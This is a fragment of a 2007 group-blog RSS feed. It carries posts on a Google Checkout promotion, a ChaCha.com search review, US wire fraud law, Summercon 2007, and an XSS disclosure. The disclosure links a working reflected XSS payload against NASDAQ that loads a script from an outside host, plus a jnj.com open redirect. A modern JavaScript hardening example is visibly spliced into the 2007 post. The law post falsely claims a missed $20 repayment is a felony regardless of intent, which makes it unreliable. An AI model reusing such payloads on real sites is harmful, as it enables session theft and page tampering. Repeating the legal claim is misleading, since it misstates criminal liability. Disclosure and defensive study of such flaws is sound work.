<p>&quot;<span style="font-style: italic" class="Apple-style-span">Wait! Doesn&#39;t Buy.com charge for shipping?</span>&quot; Yes and no; in this case, the latter. It will take between 7 and 9 days for your item to arrive, but if you do pick that delayed routing it won&#39;t cost you a dime, as the associated taxes/costs for shipping aren&#39;t applicable since they offer it for free.</p>
<p>Add the Thumbdrive to your Cart and select the Google Checkout option. Go through the usual routine of adding your details as requested by the application, set up your address and voila! You should see a screen totalling $0.00 and a friendly reminder telling you that your order has been placed and is being shipped accordingly.</p>
<p>So, get out there and get to it. Happy shopping :)&nbsp;</p>
<p>***UPDATE***</p>
<p>Further searching revealed another article which offers a significant listing of websites participating in this &#39;promotion&#39; @&nbsp;http://www.downloadsquad.com/2007/01/19/10-free-from-google-checkout-which-stores-are-participating/ . Check it out and drop him a comment thanking him for the consolidation of this list.&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2007/12/13/make-out-with-google-checkout/feed/</wfw:commentRss>
		</item>
		<item>
		<title>ChaCha.com - Here comes 1999 all over again.</title>
		<link>http://www.thereformed.org/2007/11/15/chachacom-here-comes-1999-all-over-again/</link>
		<comments>http://www.thereformed.org/2007/11/15/chachacom-here-comes-1999-all-over-again/#comments</comments>
		<pubDate>Thu, 15 Nov 2007 16:33:31 +0000</pubDate>
		<dc:creator>D. Shanley</dc:creator>
		
		<category><![CDATA[thereformed]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2007/11/15/chachacom-here-comes-1999-all-over-again/</guid>
		<description><![CDATA[I heard about a searching service recently that promises to &#34;give more specific and relevant results&#34;. ChaCha.com attempts to give the web a personal shopper when looking for results. I always hit Google - never once in my life have I not been able to find what I need when using Google, but I like [...]]]></description>
			<content:encoded><![CDATA[<p>I heard about a searching service recently that promises to &quot;give more specific and relevant results&quot;. <strong><a href="http://www.chacha.com" target="_blank">ChaCha.com</a></strong> attempts to give the web a personal shopper when looking for results. I always hit Google - never once in my life have I not been able to find what I need when using Google, but I like to test the waters with new web technologies so I thought I would give it a go.<span id="more-101"></span></p>
<p>I can imagine they get a lot of pranksters asking questions like &quot;how can I steal my mom&#39;s credit card&quot;. However I posed a rather specific question to them (it was actually a problem I was having at work and was unsure of how to fix it).</p>
<p>My search was for: &quot;<strong>Format or relabel drive in OpenBoot for Solaris</strong>&quot;</p>
<p>I signed up for an account, started my &quot;<em>search with a guide</em>&quot; and the following conversation took place:&nbsp;</p>
<p><strong><font><span style="color: #9bbb59" class="Apple-style-span">Status:</span></font><font color="#ff0000"> </font></strong>Connecting &#8230;Status: Looking for a guide &#8230;<br /> Looking: &#8230;</p>
<p><strong><font><span style="color: #9bbb59" class="Apple-style-span">Status:</span></font></strong> Marilisa has connected to help you with your search on format or relabel drive in OpenBoot for Solaris. Please wait while your guide searches for your results.</p>
<p><strong><font><span style="color: #9bbb59" class="Apple-style-span">Marilisa:</span></font></strong> Welcome to ChaCha!</p>
<p><strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> hello.</p>
<p> <strong><font><span style="color: #9bbb59" class="Apple-style-span">Marilisa</span></font><font><span style="color: #9bbb59" class="Apple-style-span">:</span></font></strong> hi! can you explain this search so I can clarify it?</p>
<p> <font><strong><span style="color: #9bbb59" class="Apple-style-span">Marilisa:</span></strong></font> chacha thinks this is written in Italian! but I think this refers to a computer issue?</p>
<p> <strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> I have a SCSI drive that had an old BSD installation on it, Solaris won&#39;t recognise it as a Sun disk so I am trying to either format the disk or relabel it using OpenBoot on a SPARC machine.</p>
<p> <strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font><font color="#0000cc"> </font></strong>yes it&#39;s a computer issue<br /> <strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> I just need to locate the commands.</p>
<p> <strong><font><span style="color: #9bbb59" class="Apple-style-span">Marilisa:</span></font></strong> ok that helps; let&#39;s see<br /> <strong><font><span style="color: #9bbb59" class="Apple-style-span">Marilisa:</span></font></strong> several links are pdf.</p>
<p>&#8230;. two minutes later - she posted a link&#8230;</p>
<p><a href="http://www.theconsultant.net/archives/category/software/solaris/" target="_blank">http://www.theconsultant.net/archives/category/software/solaris/&nbsp;</a></p>
<p><strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> that link you posted is a generic Solaris link. Solaris is a UNIX operating system.</p>
<p><strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> I need a specific list of disk commands for OpenBoot.</p>
<p>&#8230; another two minutes go by</p>
<p><strong><font><span style="color: #9bbb59" class="Apple-style-span">Marilisa:</span></font></strong> I am trying to send the pdf links but chacha doesn&#39;t let me.</p>
<p><strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> right.</p>
<p>&#8230; another minute&nbsp;</p>
<p><strong><font><span style="color: #c3d69b" class="Apple-style-span">You:</span></font></strong> you know what I think I might just hit google myself.</p>
<p>After looking on Google for about 25 seconds I found this link to a forum post which answered my question perfectly.</p>
<p><a href="http://forum.java.sun.com/thread.jspa?threadID=5082643&amp;start=0&amp;tstart=0" target="_blank">http://forum.java.sun.com/thread.jspa?threadID=5082643&amp;start=0&amp;tstart=0&nbsp;</a></p>
<p>So as you can see from this, I most certainly did not get a more specific result. No offense to Marilisa, she was probably confused and had no idea what I was talking about. But the point I am making is that back in the original Web 1.0 boom we had all kinds of stupid and daft ideas popping up that were utterly useless and could never hope to make a penny in revenue. As the investors were pouring in the millions, they were falling straight back out the bottom and tumbling down the drain. This ChaCha service reeks of those wild and reckless Boo.Com days.</p>
<p>I honestly think that this time around there is a little more sense floating around in investors and VC/Angel Investors, however we are getting dangerously close to the champagne-party-come-private-jet fest that crippled the industry last time round. It seems that people are panic building products that suck, just so they may be in with a chance of being bought out by Google or Yahoo! for $5billion in 3 months. Inventing solutions for problems that don&#39;t exist - and burning through billions whilst doing so.&nbsp;</p>
<p>Looks like the 2.0 bubble is on the cusp of yet another pop.</p>
<p>Let&#39;s party like it&#39;s 1999.&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2007/11/15/chachacom-here-comes-1999-all-over-again/feed/</wfw:commentRss>
		</item>
		<item>
		<title>U.S. Code Gives Twenty for Free</title>
		<link>http://www.thereformed.org/2007/10/25/us-code-gives-twenty-for-free/</link>
		<comments>http://www.thereformed.org/2007/10/25/us-code-gives-twenty-for-free/#comments</comments>
		<pubDate>Thu, 25 Oct 2007 13:31:17 +0000</pubDate>
		<dc:creator>J. Longoria</dc:creator>
		
		<category><![CDATA[falsehoods]]></category>

		<category><![CDATA[government]]></category>

		<category><![CDATA[j. longoria]]></category>

		<category><![CDATA[law]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2007/10/25/us-code-gives-twenty-for-free/</guid>
		<description><![CDATA[I&#39;ve become concerned with the ever increasing results of unintentional criminals being created by laws in the United States through no direct or intended fault of their own. Laws are meant to govern specific processes and act as guidance to maintain a functional society. They also provide a reference for penalties of violations in law [...]]]></description>
			<content:encoded><![CDATA[<p>I&#39;ve become concerned with the ever increasing results of unintentional criminals being created by laws in the United States through no direct or intended fault of their own. Laws are meant to govern specific processes and act as guidance to maintain a functional society. They also provide a reference for penalties of violations in law and as such we&#39;re expected to abide accordingly. So what happens when the legislation becomes far too generalized in it&#39;s verbose definitions?<span id="more-100"></span></p>
<p><em><font color="#ff9900">(<strong>note:</strong> Please consider that I am not an attorney or paralegal and my perspective is based off the understanding of the US Code through review of legislation, case studies and general&nbsp;commentary - if you are a legal professional, please feel free to post your perspective on this entry in the Comments below as I would be intrigued to know your opinions on this)</font></em></p>
<p>Let&#39;s refine this situation a little: Simple people can easily become simple felons. Searching through the web on some wire fraud information, I eventually landed on Cornell University&#39;s Law School website where I came across this entry in the <u>United States Code</u>:</p>
<p><strong>TITLE 18, PART I, CHAPTER 63, &sect; 1343 - Fraud by wire, radio, or television</strong></p>
<p><em><font color="#99cccc">Whoever, having devised or intending to devise any scheme or artifice to defraud, or for obtaining money or property by means of false or fraudulent pretenses, representations, or promises, transmits or causes to be transmitted by means of wire, radio, or television communication in interstate or foreign commerce, any writings, signs, signals, pictures, or sounds for the purpose of executing such scheme or artifice, shall be fined under this title or imprisoned not more than 20 years, or both. If the violation affects a financial institution, such person shall be fined not more than $1,000,000 or imprisoned not more than 30 years, or both.</font></em></p>
<p>(<strong>source:</strong> <a href="http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001343----000-.html">http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_00001343----000-.html</a>)</p>
<p>&quot;Ok fella, so what does this mean for me?&quot;, you&#39;re probably asking yourself as a US citizen or just an interested party. Glad you asked! Taken in context, this one entry applies directly to your everyday life. ANY communication of commitment relayed by telephone, e-mail, radio, television or any other form of electronic broadcast that is produced through a physical medium identified in the title is considered binding.</p>
<p>Example: say I owe my friend $20.00US he lent me for a purchase. My original intent is to pay him back. In person, I would relay that to him and with his acceptance of those terms the agreement would be finalized, maybe with a handshake or just a verbal confirmation. Say I then become incapable of following through immediately, or we somehow reach an impasse where the agreement is in question - on my defaulted/delayed payment the ramifications are very minimal, other than harming the friend&#39;s perspective of my character and weakening the weight my &#39;word&#39; carries with him or others.</p>
<p>Under normal circumstances, this is generally enforceable only as a &#39;gentleman&#39;s agreement&#39; (<strong>reference:</strong> <a href="http://en.wikipedia.org/wiki/Gentlemen&#39;s_agreement">http://en.wikipedia.org/wiki/Gentlemen&#39;s_agreement</a>), or a mutually agreed on set of terms between two cooperating parties -&nbsp; although it should be noted that in some states such as Texas, verbal agreements are admissible in court as legally binding. The point of the gentleman&#39;s agreement is convenient, mutual, social-based commitments to each other, an act that we might commit on a daily basis - the underlying theme is honor.</p>
<p>However, when you include transmission of that agreement over wire, radio or television (<em>although I am not sure why you would do the latter</em>) (<em>i.e. if I called him and let him know, &quot;hey buddy, I am going to pay you back this week&quot;</em>) and then I fail to follow through on my commitment in the timeframe I&#39;ve set, by the letter of the law I have just committed a felonious act which is punishable by up to 20 years in prison, regardless of the intent.</p>
<p>Outside of the technology used to relay this, it also boils down to the definition of fraud, which can vary by state. &quot;I&#39;m not defrauding anyone though, it just didn&#39;t happen as I expected!&quot; Unfortunately, that isn&#39;t accurate. Although fraud is generally defined as an act of deception or an attempt at a hoax, it can also be defined as failure to act on or effect the provisions of a commitment or contract between parties.</p>
<p>Because of these reasons, I would have unintentionally committed fraud through a device such as a cellphone, perhaps, and be subject to severe penalty in a court of law, because I didn&#39;t pay my friend back his $20.00US according to the timeframe or terms agreed upon.</p>
<p>I&#39;ll acknowledge that it would be an extreme case to take to court for damages of non-payment for $20.00US, however, it provides sufficient example of how the current legislation doesn&#39;t make a proper determination or distinction between the circumstance and intent of the parties involved and the role of a medium and the usage thereof which they&#39;ve communicated that through - a law meant to punish severe, criminal violators on a federal level now can be misused to harass normally law abiding citizens.</p>
<p>Wrapping up, just one more reason to be careful about what you say on the Internet, telephone or radio in this day and age. Because a commitment you relay today could come back to haunt you tomorrow. If you&#39;re going to give your word, stand by it.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2007/10/25/us-code-gives-twenty-for-free/feed/</wfw:commentRss>
		</item>
		<item>
		<title>REVIEW: Summercon 2007</title>
		<link>http://www.thereformed.org/2007/08/26/summercon-2007/</link>
		<comments>http://www.thereformed.org/2007/08/26/summercon-2007/#comments</comments>
		<pubDate>Sun, 26 Aug 2007 16:19:25 +0000</pubDate>
		<dc:creator>A. Ely</dc:creator>
		
		<category><![CDATA[a. ely]]></category>

		<category><![CDATA[briefs]]></category>

		<category><![CDATA[experience]]></category>

		<category><![CDATA[review]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2007/08/26/summercon-2007/</guid>
		<description><![CDATA[For those not familiar with Summercon, it is &#34;a strong tradition of last minute disorganized last-minute planning&#34;.

This year Summercon returned to Atlanta so I made my first appearance in 7 years.&#160; Among the things that made it worth going this year:

A shoe being thrown during a presentation for no reason
Billy Hoffman drinking 4 beers at [...]]]></description>
			<content:encoded><![CDATA[<p>For those not familiar with <a href="http://www.summercon.org">Summercon</a>, it is &quot;a strong tradition of last minute disorganized last-minute planning&quot;.</p>
<p><span id="more-80"></span></p>
<p>This year Summercon returned to Atlanta so I made my first appearance in 7 years.&nbsp; Among the things that made it worth going this year:</p>
<ul>
<li>A shoe being thrown during a presentation for no reason</li>
<li><a href="http://www.memestreams.net/users/acidus/blogid10321135/">Billy Hoffman</a> drinking 4 beers at once while giving a presentation</li>
<li>Caleb Sima confused by the mayhem during his presentation</li>
<li>redpantz directing traffic in Midtown Atlanta</li>
<li>Seeing people I haven&#39;t seen in years</li>
</ul>
<p> In case you hadn&#39;t figured it out yet.&nbsp; Summercon is ultimately about the social side of the security industry.&nbsp; We get together to have fun, talk a little business, and make new friends.&nbsp; If you ever have the chance, please attend.&nbsp; I had a great time.</p>
<p>Oh, and some people talked about some security stuff too. <a href="http://www.spidynamics.com">SPI Dynamics</a> (HP), <a href="http://www.iss.net">ISS</a> (IBM), and others were represented. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2007/08/26/summercon-2007/feed/</wfw:commentRss>
		</item>
		<item>
		<title>DISCLOSURE: XSS Fun</title>
		<link>http://www.thereformed.org/2007/08/24/xss-fun/</link>
		<comments>http://www.thereformed.org/2007/08/24/xss-fun/#comments</comments>
		<pubDate>Fri, 24 Aug 2007 02:01:13 +0000</pubDate>
		<dc:creator>A. Ely</dc:creator>
		
		<category><![CDATA[a. ely]]></category>

		<category><![CDATA[security]]></category>

		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.thereformed.org/2007/08/24/xss-fun/</guid>
		<description><![CDATA[If we are going to release security flaws which might lead us into an industry shakedown, we may as well go for the trifecta. 
 NASDAQ&#160; Johnson &#38; Johnson
Yes, these have been disclosed/reported to the hosts&#160;with adequate time allowed for acknowledgment. The NASDAQ one is quite intriguing since you can rewrite the site&#39;s html source.
When [...]]]></description>
			<content:encoded><![CDATA[<p>If we are <a href="http://www.thereformed.org/2007/08/23/snatching-protected-myspace-music-using-safari/">going to release security flaws</a> which might lead us into an industry shakedown, we may as well go for the trifecta. <span id="more-79"></span></p>
<p> <a href="http://dynamic.nasdaq.com/asp/52weekshilow.asp?exchange=%3CSCRIPT%20%20LANGUAGE=%27JAVASCRIPT%27%20SRC=%27HTTP://AUDIT.780INC.COM/ALERT.JS%27%3E%3C/SCRIPT%3E&amp;status=Low">NASDAQ&nbsp;</a><br /> <a href="http://www.jnj.com/careers/link_jobboard.html?rsparam=http://780inc.com">Johnson &amp; Johnson</a></p>
<p>Yes, these have been disclosed/reported to the hosts&nbsp;with adequate time allowed for acknowledgment. The NASDAQ one is quite intriguing since you can rewrite the site&#39;s html source.</p>
<p>When will programmers learn to write secure from day one?</p>
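<p>To make the &quot;secure from day one&quot; point concrete, here is an added example that is not code from this post or from either of the sites named in it: a hypothetical page handler that reflects a query parameter into HTML without encoding (the pattern behind the <em>exchange</em> link above), the hardened version beside it, and an allow-list check for a redirect parameter (the pattern behind the <em>rsparam</em> link). The handler shape, the page markup and the allowed-host list are assumptions; the query string fed to it is the decoded payload from the NASDAQ link.</p>

```javascript
// Added example, not code from the original post or from either site named
// in it: a hypothetical handler that reflects a query parameter into HTML
// without encoding, the hardened version beside it, and an allow-list check
// for a redirect parameter. Handler shape, page markup and the allowed-host
// list are assumptions. Runs under Node.js (URL and URLSearchParams are globals).

// HTML-encode the five characters that let untrusted text escape an HTML
// text node or a quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the decoded 'exchange' value is concatenated straight into the
// page, so a <script> tag supplied in the query string becomes a real script
// element when the browser parses the response.
function renderVulnerable(queryString) {
  const params = new URLSearchParams(queryString);
  const exchange = params.get('exchange') || '';
  const status = params.get('status') || '';
  return '<h1>52 week ' + status + ' for ' + exchange + '</h1>';
}

// Hardened: every untrusted value is encoded for the HTML text context it is
// written into, so the same payload is rendered as literal text.
function renderSafe(queryString) {
  const params = new URLSearchParams(queryString);
  const exchange = escapeHtml(params.get('exchange') || '');
  const status = escapeHtml(params.get('status') || '');
  return '<h1>52 week ' + status + ' for ' + exchange + '</h1>';
}

// Redirect target check: accept a same-site relative path, or an http(s) URL
// whose host is on the allow list; anything else returns null so the caller
// falls back to a fixed landing page instead of forwarding the user off-site.
function safeRedirectTarget(target, allowedHosts) {
  if (typeof target !== 'string' || target.length === 0) return null;
  // A relative path must start with exactly one '/': '//host' is a
  // scheme-relative URL and browsers treat '/\host' the same way.
  if (target.charAt(0) === '/') {
    return /^\/[\/\\]/.test(target) ? null : target;
  }
  let url;
  try {
    url = new URL(target); // throws on anything that is not an absolute URL
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return allowedHosts.indexOf(url.hostname) !== -1 ? target : null;
}

// Constructed input: the query string of the NASDAQ link in the post, as the
// server would receive it (the script host is the author's own audit host).
const PAYLOAD_QUERY =
  'exchange=%3CSCRIPT%20%20LANGUAGE=%27JAVASCRIPT%27%20SRC=%27HTTP://AUDIT.780INC.COM/ALERT.JS%27%3E%3C/SCRIPT%3E&status=Low';

// Run both renderers and the redirect check on the page's own parameters and
// return the results so they can be inspected or asserted on.
function demo() {
  return {
    vulnerable: renderVulnerable(PAYLOAD_QUERY),
    safe: renderSafe(PAYLOAD_QUERY),
    offSiteRedirect: safeRedirectTarget('http://780inc.com', ['www.jnj.com']),
    onSiteRedirect: safeRedirectTarget('/careers/jobs', ['www.jnj.com']),
  };
}

console.log(demo());
```

<p>The vulnerable renderer hands the browser a literal <code>&lt;SCRIPT SRC=...&gt;</code> element pointing at a host the attacker controls, which is exactly the &quot;rewrite the site&#39;s html source&quot; outcome noted above; the hardened one emits <code>&amp;lt;SCRIPT ...</code> and the payload is displayed as text. For the redirect parameter, the check returns null for an off-site absolute URL, a scheme-relative <code>//host</code> path or a <code>javascript:</code> URL, and only passes through a same-site path or an allow-listed host.</p>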
]]></content:encoded>
			<wfw:commentRss>http://www.thereformed.org/2007/08/24/xss-fun/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
